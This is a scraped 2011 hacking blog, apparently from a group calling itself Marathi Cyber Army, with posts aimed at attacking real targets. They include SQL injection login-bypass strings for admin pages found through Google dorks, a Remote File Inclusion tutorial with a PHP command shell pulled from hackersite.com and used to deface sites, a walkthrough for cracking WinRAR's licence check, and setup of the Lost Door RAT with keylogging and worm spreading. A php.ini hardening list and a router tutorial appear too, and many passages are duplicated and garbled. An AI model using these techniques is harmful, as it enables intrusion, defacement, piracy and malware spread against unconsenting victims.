Marathi Cyber Army
For more information about all hacking tricks and vulnerabilities.
http://www.marathicyberarmy.in
Saturday, 3 December 2011
Saturday, 1 October 2011
How to secure your server from PHP Shells!
Adding these code in your php.ini file will protect your server from execution of Shells likec99 or b374k.
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect
safe_mode = On
register_globals = Off
display_errors = Off
allow_url_fopen = Off
allow_url_include = Off
enable open_basedir(set it to webroot path)
Hack / Bypass .asp sites using SQL Injection
Hack any .asp sites with SQL Injection attack.
1st, Open Google and search for adminlogin.asp or admin\login.asp
2nd, Open any search result and you will get a login page. Use
User: Admin
Pass: ‘or’1′=’1
Pass: ‘or’1′=’1
or
User: admin
Pass: ’ or 1=1–
Pass: ’ or 1=1–
or
User: ’ or 1=1–
Pass: ’ or 1=1–
Pass: ’ or 1=1–
We are using some simple SQL injection strings to hack asp sites. If you need more strings please submit your e-mail id. I will send all SQL Strings within 24 hour.
Reset Samsung Mobile Tracker Code
These Code Reset All Code In Your Samsung Mobile(Any Model)
Samsung Tracker Code Also Reset By These Codes
If You Forget Your Code Don’t Worry
>> Turn Off Your Mobile
>> Remove The SIM
>> Turn On Your Mobile Without SIM
>> Enter The Code *2767*637# (Universal Unlock Code)(Reset Mobile Tracker Code)
>> Enter The Code *2767*3855#(Full EEPROM Reset)(Reset All Type Of Code)
If You Forget Your Code Don’t Worry
>> Turn Off Your Mobile
>> Remove The SIM
>> Turn On Your Mobile Without SIM
>> Enter The Code *2767*637# (Universal Unlock Code)(Reset Mobile Tracker Code)
>> Enter The Code *2767*3855#(Full EEPROM Reset)(Reset All Type Of Code)
Thursday, 21 July 2011
GNS 3 Tutorial – Basic Router password Configuration..
Hi folks..I have started my first steps into Cisco, & would be sharing my small experiments in it. Actually , this time I am covering the basics using GNS3 which is a powerful open source network simulator to simulate a simple topology of 2 routers with their basic configuration & commands. I assume you have worked with GNS3 or atleast know how to load IOS & make a simple topology..
So, firstly download GNS3 & install it. Get IOS images from and load them (if you are really not sure of this step, mail me, I will expand the basics more)
The topology I created is this -
2 routers connected via gigabit . What we will be doing is -
So, firstly download GNS3 & install it. Get IOS images from and load them (if you are really not sure of this step, mail me, I will expand the basics more)
The topology I created is this -
2 routers connected via gigabit . What we will be doing is -
- Set router password.
- Set telnet password
- Set Console Password
- Encrypt All passwords.
- Set Ip Address of routers.
Connected to Dynamips VM "R2" (ID 7, type c7200) - Console portTo get into privilege mode, type this command.
R2>enTo configure router, type this command ..
R2#conf tTo set router password & encrypt all passwords type these commands
Enter configuration commands, one per line. End with CNTL/Z.
R2(config)#enable secret router2Now to set console & its password type these commands
R2(config)#service pass
R2(config)#service password-encryption
R2(config)#line console 0Now to set telnet (vty/virtual terminal) & its password type these commands
R2(config-line)#password console
R2(config-line)#login
R2(config-line)#exit
R2(config)#line vty 0 4Once done, you can now configure the interface by typing these commands
R2(config-line)#password telnet
R2(config-line)#login
R2(config-line)#exit
R2(config)#int g1/0Once done, you can see the configuration by typing -
R2(config-if)#desc ROUTER LAN 2 GIGABIT INTERFACE
R2(config-if)#ip address 192.168.1.20 255.255.255.0
R2(config-if)#no shut
R2(config-if)#
*Feb 19 19:56:42.035: %LINK-3-UPDOWN: Interface GigabitEthernet1/0, changed state to up
R2(config-if)#
*Feb 19 19:56:42.035: %ENTITY_ALARM-6-INFO: CLEAR INFO Gi1/0 Physical Port Administrative State Down
*Feb 19 19:56:43.035: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0, changed state to up
R2(config-if)#end
*Feb 19 19:56:47.723: %SYS-5-CONFIG_I: Configured from console by console
R2#
R2#show running-configIf done properly, it will look like more or less the same I have pasted above. Also, as you can see, all the passwords are encrypted. In the similar way you can configure Router 1. Make a note os passwords, I have kept quite simple passwords just to demonstrate the configuration. Please keep secure passwords ,
Building configuration...
Current configuration : 932 bytes
!
upgrade fpd auto
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname R2
!
boot-start-marker
boot-end-marker
!
enable secret 5 $1$trNZ$uNTgBIA1QG43/4YEB29lf/
!
no aaa new-model
ip cef
!
!
!
!
no ip domain lookup
!
multilink bundle-name authenticated
!
!
!
archive
log config
hidekeys
!
!
interface FastEthernet0/0
no ip address
shutdown
duplex half
!
interface GigabitEthernet1/0
description ROUTER LAN 2 GIGABIT INTERFACE
ip address 192.168.1.20 255.255.255.0
negotiation auto
!
no ip http server
no ip http secure-server
!
!
!
logging alarm informational
!
!
control-plane
!
!
gatekeeper
shutdown
!
!
line con 0
exec-timeout 0 0
password 7 070C2E425D061500
logging synchronous
login
stopbits 1
line aux 0
stopbits 1
line vty 0 4
password 7 06120A2D424B1D
login
!
!
webvpn cef
!
end
R2#
A simple tutorial on Remote File Inclusion (RFI)..
RFI stands for Remote File Inclusion, and it allows the attacker to upload a
custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or touse automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
I leave the rest on your creativity..
custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or touse automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
http://victimsite.com/index.php?page=homeAs you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txtI have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -
- Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
- Case 3 – successfull execution :)
echo "";
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.
http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscriptWhat it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..
http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
cmd=echo U r pwn3d by xero> index.phpIt will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..
I leave the rest on your creativity..
An Introduction to Revrerse Engineering - Reversing Winrar step by step...
Hi folks,its been a long time since I have posted some thing technical,so I will be writing about the challenge I got at NIT
KU, where I reverse engineered WinRAR 3.80 using a disassembler and will tell you the same here. Furthermore, major software are analysed using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to reverse engineering and disassembling.
To perform this hack you will be needing -
How to Reverse Engineer?
You need to have a bit knowledge of assembly language,and in case you don't have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .
Now copy the WinRAR.exe file to desktop. Make a copy of it there.
Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.
The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..
After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn't checks for the condition.
In the above code you can see this code -
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.
Now in the dialog box that opens,search for “please” and you will get the reference as -
Double click on it and you will reach the subsequent code.
The code will be something like
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.
Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.
After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.
After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -
and search in the code.
After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes -
After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -
Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P
Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.
Launch Resource Hacker, load the copyofwinrar.exe in it
Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one :P
and click on Compile Script button.
Now save the file with any name on your desktop or any location what so ever.
Now you have a fully patched WinRAR.exe file :)) . If you want to learn that, move on to next step.
Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.
Click on Add – ; Offset patch
After you have done that, double click on offset patch and then
Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.
Congrats you have created a patch of your own and have learned to reverse engineer WinRAR :)
You can crack other software in the same way…just practice,debug and disassemble and you will get the way :)
KU, where I reverse engineered WinRAR 3.80 using a disassembler and will tell you the same here. Furthermore, major software are analysed using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to reverse engineering and disassembling.The Tools
Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.
To perform this hack you will be needing -
- Any De-assembler (I use Hackers Disassembler and Hview )
- Resource Hacker
- A patch Creator ( Use Universal Patch Creator or Code fusion)
How to Reverse Engineer?
You need to have a bit knowledge of assembly language,and in case you don't have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
Now copy the WinRAR.exe file to desktop. Make a copy of it there.
Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.
The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..
After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn't checks for the condition.
In the above code you can see this code -
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00This is the code responsible for validating you as a legal user :) . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71 .
00444B71: 0F859B000000 JNE 00444C12
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.
Now in the dialog box that opens,search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”
The code will be something like
* String: “REMINDER”Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.
0048731A: 68EB5E4B00 push 004B5EEB
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.
Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.
After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.
After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -
Type .444B71 in place of 00444B71
and search in the code.
After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes -
After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -
Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P
Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.
Launch Resource Hacker, load the copyofwinrar.exe in it
Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one :P
 |
and click on Compile Script button.
Now save the file with any name on your desktop or any location what so ever.
Now you have a fully patched WinRAR.exe file :)) . If you want to learn that, move on to next step.
Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.
Click on Add – ; Offset patch
After you have done that, double click on offset patch and then
- Give path of original winrar.exe
- Give path of unmodified Winrar.exe (again)
- Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
- Click on compare and it will show difference between both files
- Click on save.
Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.
Congrats you have created a patch of your own and have learned to reverse engineer WinRAR :)
You can crack other software in the same way…just practice,debug and disassemble and you will get the way :)
[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. ]
Hacking PHP 4.4 sites in 20 seconds...
Now here is a real hacking tutorial in which I am going to hack a real website,and that too in less than 20 seconds.and I am not kidding. Actually sites with PHP 4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.
Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course :P).It will be partial in nature,that is I WILL not be teaching each and everything to you,I assume you know basics of SQL injection/PHP injection/Google searching,and if you don't then read these articles first -
In the mean time,here is how you can start -
Step 1 – Search for them
Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.
Step 2 – Scan them
Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000 ie -
Step 3 – Hack them
Now in the fields,you have to type -
and press go,you will login into admin
voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.
I hope that was informative :P go learn something.
Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course :P).It will be partial in nature,that is I WILL not be teaching each and everything to you,I assume you know basics of SQL injection/PHP injection/Google searching,and if you don't then read these articles first -
Google Search Tips for Hacking
Google Secrets – Some Cool Google Dorks
Basics of SQL Injection
SQL injection by example
Simple Nmap Scanning
In the mean time,here is how you can start -
Step 1 – Search for them
Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.
Step 2 – Scan them
Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000 ie -
http://www.website.com:2000and you will be comfortably login into admin page like this -
Step 3 – Hack them
Now in the fields,you have to type -
username – admin
password – a’ or 1=1 or ‘b
domain - a’ or 1=1 or ‘b
and press go,you will login into admin
voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.
I hope that was informative :P go learn something.
SQL injection automated software SQLMAP...
Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:
You Can download sqlmap 0.7 here:
Linux Source: sqlmap-0.7.tar.gz
Windows Portable: sqlmap-0.7_exe.zip
How to Control a Remote Computer using Lost Door...
Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.
Disclaimer: Coder and related sites are not responsible for any abuse done using this software.
Follow the steps below to setup a server for Lost Door.
- Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
- On executing the download file, you will see the following screen. Accept it
- After it is open, right click on the window and click on create server
- Now enter your IP address and DNS here. Leave the rest of the field as it is.
- Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.
- Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.
- Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.
Sending the server file to your victim
This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.
- If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
- For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.
Using Spreading to affect multiple victims
If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.
Download from here
Subscribe to:
Posts (Atom)